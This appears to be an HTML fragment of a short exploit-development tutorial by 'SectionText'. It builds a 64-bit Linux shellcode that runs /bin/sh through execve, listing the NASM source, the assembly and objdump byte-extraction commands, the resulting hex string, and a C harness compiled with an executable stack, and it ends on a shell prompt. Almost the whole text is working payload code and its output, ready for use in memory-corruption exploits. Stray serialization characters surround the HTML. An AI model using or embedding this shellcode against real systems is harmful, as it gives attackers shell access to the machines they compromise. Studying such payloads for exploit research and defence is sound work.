I"É<hr />
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>âžœ  ~  <span class="nb">cat </span>shellcode.asm
</code></pre></div></div>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kr">section</span> <span class="p">.</span><span class="n">text</span>
	<span class="kr">global</span> <span class="n">_start</span>
<span class="n">_start</span><span class="o">:</span>
	<span class="k">jmp</span> <span class="n">shell</span>
<span class="n">here</span><span class="o">:</span>
	<span class="k">xor</span> <span class="n">rax</span><span class="p">,</span><span class="n">rax</span>
	<span class="k">pop</span> <span class="n">rdi</span>
	<span class="k">xor</span> <span class="n">rsi</span><span class="p">,</span><span class="n">rsi</span>
	<span class="k">xor</span> <span class="n">rdx</span><span class="p">,</span><span class="n">rdx</span>
	<span class="k">add</span> <span class="n">rax</span><span class="p">,</span><span class="mi">59</span>
	<span class="k">syscall</span>
<span class="n">shell</span><span class="o">:</span>
	<span class="k">call</span> <span class="n">here</span>
<span class="n">bash</span> <span class="kt">db</span> <span class="s">"/bin//sh"</span>
</code></pre></div></div>
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>âžœ  ~  nasm <span class="nt">-f</span> elf64 shellcode.asm <span class="nt">-o</span> shellcode.o
âžœ  ~  ld shellcode.o <span class="nt">-o</span> shellcode
âžœ  ~  file shellcode
shellcode: ELF 64-bit LSB executable, x86-64, version 1 <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, not stripped
âžœ  ~  <span class="k">for </span>i <span class="k">in</span> <span class="si">$(</span>objdump <span class="nt">-d</span> shellcode <span class="nt">-M</span> intel | <span class="nb">grep</span> <span class="s2">"^ "</span> | <span class="nb">cut</span> <span class="nt">-f2</span><span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'\x'</span><span class="nv">$i</span><span class="p">;</span> <span class="k">done</span><span class="p">;</span><span class="nb">echo</span>
</code></pre></div></div>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">\</span><span class="n">xeb</span><span class="err">\</span><span class="n">x10</span><span class="err">\</span><span class="n">x48</span><span class="err">\</span><span class="n">x31</span><span class="err">\</span><span class="n">xc0</span><span class="err">\</span><span class="n">x5f</span><span class="err">\</span><span class="n">x48</span><span class="err">\</span><span class="n">x31</span><span class="err">\</span><span class="n">xf6</span><span class="err">\</span><span class="n">x48</span><span class="err">\</span><span class="n">x31</span><span class="err">\</span><span class="n">xd2</span><span class="err">\</span><span class="n">x48</span><span class="err">\</span><span class="n">x83</span><span class="err">\</span><span class="n">xc0</span><span class="err">\</span><span class="n">x3b</span><span class="err">\</span><span class="n">x0f</span><span class="err">\</span><span class="n">x05</span><span class="err">\</span><span class="n">xe8</span><span class="err">\</span><span class="n">xeb</span><span class="err">\</span><span class="n">xff</span><span class="err">\</span><span class="n">xff</span><span class="err">\</span><span class="n">xff</span><span class="err">\</span><span class="n">x2f</span><span class="err">\</span><span class="n">x62</span><span class="err">\</span><span class="n">x69</span><span class="err">\</span><span class="n">x6e</span><span class="err">\</span><span class="n">x2f</span><span class="err">\</span><span class="n">x2f</span><span class="err">\</span><span class="n">x73</span><span class="err">\</span><span class="n">x68</span>
</code></pre></div></div>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>```c++
#include &lt;stdio.h&gt;
unsigned char shellcode[] = "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
int main() { int (*ret)() = (int(*)())shellcode; ret();}
</code></pre></div></div>
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>âžœ  ~  gcc shellcode.c <span class="nt">-z</span> execstack <span class="nt">-o</span> c_shellcode
âžœ  ~  ./shellcode
<span class="c"># </span>
</code></pre></div></div>
<hr />
<h1 id="author-sectiontext">Author <a href=" https://twitter.com/SectionText">SectionText</a></h1>
<hr />
:ET